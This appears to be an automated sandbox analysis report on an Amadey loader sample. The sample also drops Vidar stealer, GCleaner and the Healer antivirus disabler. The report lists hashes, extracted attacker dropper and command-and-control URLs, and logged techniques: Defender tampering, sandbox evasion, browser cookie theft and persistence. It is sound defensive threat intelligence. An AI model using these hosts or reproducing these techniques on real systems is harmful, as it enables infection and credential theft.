amadey | f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b

Analysis

max time kernel
39s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
27/03/2025, 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
Size

938KB
MD5

5ec95a42b16d80c72d17cc6d0bac58de
SHA1

9cfd9221606e1acfef1ea5f6f4bf88080822d5db
SHA256

f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b
SHA512

ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b
SSDEEP

24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X

Score

10^/10

amadey gcleaner healer vidar 092155 11373d37b176b52c098f600f61cdf190 70790cf457f5ee5e9df1780bfa648812 928af183c2a2807a3c0526e8c0c9369d credential_access defense_evasion discovery dropper execution exploit loader persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Version

13.3

Botnet

11373d37b176b52c098f600f61cdf190

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

vidar

Version

13.3

Botnet

70790cf457f5ee5e9df1780bfa648812

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 37 IoCs

stealer

resource	yara_rule
behavioral2/memory/3800-63-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-64-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-73-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-74-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-79-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-94-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-97-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-117-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-118-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-119-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-123-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-124-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-488-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-492-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-493-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-514-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-517-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-538-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-545-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-553-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-549-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-556-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/6092-891-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/6092-892-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-912-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-946-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-948-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-951-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-952-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-965-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-967-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-992-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-993-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5320-1009-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5320-1010-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3800-1011-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/6092-1044-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral2/memory/12180-24323-0x00000000007A0000-0x0000000000C18000-memory.dmp	healer
behavioral2/memory/12180-24325-0x00000000007A0000-0x0000000000C18000-memory.dmp	healer

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2cccccb164.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cde2c327ff.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
20	6036	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6036	powershell.exe
10960	powershell.exe
9072	powershell.exe
5092	powershell.exe
320	powershell.exe
1888	powershell.exe
8412	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 8 IoCs

flow	pid	Process
192	5580	futors.exe
20	6036	powershell.exe
30	764	rapes.exe
64	764	rapes.exe
92	764	rapes.exe
92	764	rapes.exe
107	5580	futors.exe
107	5580	futors.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5496	takeown.exe
224	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 34 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
24624	chrome.exe
4792	chrome.exe
1840	msedge.exe
6612	chrome.exe
24436	chrome.exe
7072	chrome.exe
2332	chrome.exe
8104	msedge.exe
9924	msedge.exe
3800	chrome.exe
12560	chrome.exe
12760	chrome.exe
4396	chrome.exe
5712	msedge.exe
4468	chrome.exe
7628	chrome.exe
5348	chrome.exe
10548	chrome.exe
11420	chrome.exe
700	chrome.exe
5304	chrome.exe
7348	chrome.exe
7948	chrome.exe
5392	chrome.exe
6120	chrome.exe
12696	chrome.exe
1564	chrome.exe
3064	chrome.exe
7364	chrome.exe
2036	chrome.exe
5628	msedge.exe
9908	msedge.exe
12548	chrome.exe
11484	chrome.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cde2c327ff.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cde2c327ff.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2cccccb164.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2cccccb164.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	futors.exe

Executes dropped EXE 15 IoCs

pid	Process
760	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
764	rapes.exe
2260	q4jfn3p.exe
1720	apple.exe
5600	22.exe
5148	22.exe
4512	amnew.exe
5580	futors.exe
1416	2cccccb164.exe
3420	gron12321.exe
4248	svchost015.exe
5916	v7942.exe
4516	cde2c327ff.exe
2452	rapes.exe
3880	futors.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	2cccccb164.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	cde2c327ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5496	takeown.exe
224	icacls.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00100000000226d7-23276.dat	autoit_exe
behavioral2/files/0x00030000000232af-24041.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
7536	tasklist.exe
8168	tasklist.exe
2756	tasklist.exe
8604	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
760	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
764	rapes.exe
1416	2cccccb164.exe
4516	cde2c327ff.exe
2452	rapes.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2260 set thread context of 3800	2260	q4jfn3p.exe	105
PID 3420 set thread context of 4968	3420	gron12321.exe	199
PID 1416 set thread context of 4248	1416	2cccccb164.exe	209
PID 5916 set thread context of 6092	5916	v7942.exe	213

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3420	sc.exe
2112	sc.exe
3060	sc.exe
2832	sc.exe
3712	sc.exe
964	sc.exe
1988	sc.exe
4180	sc.exe
5408	sc.exe
3556	sc.exe
1004	sc.exe
3956	sc.exe
376	sc.exe
2564	sc.exe
1420	sc.exe
5080	sc.exe
3260	sc.exe
3348	sc.exe
924	sc.exe
1872	sc.exe
1068	sc.exe
4468	sc.exe
4344	sc.exe
3264	sc.exe
3216	sc.exe
4464	sc.exe
4732	sc.exe
5976	sc.exe
420	sc.exe
5924	sc.exe
5488	sc.exe
4856	sc.exe
1204	sc.exe
6036	sc.exe
5980	sc.exe
1488	sc.exe
1920	sc.exe
5464	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
9212	11712	WerFault.exe	380
18328	11668	WerFault.exe	379
24428	9100	WerFault.exe	392
24560	11428	WerFault.exe	377
24712	11428	WerFault.exe	377

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2cccccb164.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cde2c327ff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1456	PING.EXE
6080	cmd.exe
3920	PING.EXE
5816	cmd.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
2204	timeout.exe
5428	timeout.exe
12964	timeout.exe
3508	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 4 IoCs

defense_evasion

pid	Process
12168	taskkill.exe
24820	taskkill.exe
25416	taskkill.exe
6956	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133875739087808163"	chrome.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3920	PING.EXE
1456	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
8904	schtasks.exe
672	schtasks.exe
11084	schtasks.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
6036	powershell.exe
6036	powershell.exe
760	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
760	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
764	rapes.exe
764	rapes.exe
3800	MSBuild.exe
3800	MSBuild.exe
3800	MSBuild.exe
3800	MSBuild.exe
5392	chrome.exe
5392	chrome.exe
3800	MSBuild.exe
3800	MSBuild.exe
1416	2cccccb164.exe
1416	2cccccb164.exe
4968	MSBuild.exe
4968	MSBuild.exe
4968	MSBuild.exe
4968	MSBuild.exe
3800	MSBuild.exe
3800	MSBuild.exe
4516	cde2c327ff.exe
4516	cde2c327ff.exe
2452	rapes.exe
2452	rapes.exe
3800	MSBuild.exe
3800	MSBuild.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
1840	msedge.exe
1840	msedge.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	6036	powershell.exe
Token: SeShutdownPrivilege	5392	chrome.exe
Token: SeCreatePagefilePrivilege	5392	chrome.exe
Token: SeShutdownPrivilege	5392	chrome.exe
Token: SeCreatePagefilePrivilege	5392	chrome.exe
Token: SeShutdownPrivilege	5392	chrome.exe
Token: SeCreatePagefilePrivilege	5392	chrome.exe
Token: SeShutdownPrivilege	5392	chrome.exe
Token: SeCreatePagefilePrivilege	5392	chrome.exe
Token: SeShutdownPrivilege	5392	chrome.exe
Token: SeCreatePagefilePrivilege	5392	chrome.exe
Token: SeShutdownPrivilege	5392	chrome.exe
Token: SeCreatePagefilePrivilege	5392	chrome.exe
Token: SeShutdownPrivilege	5392	chrome.exe
Token: SeCreatePagefilePrivilege	5392	chrome.exe

Suspicious use of FindShellTrayWindow 30 IoCs

pid	Process
4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
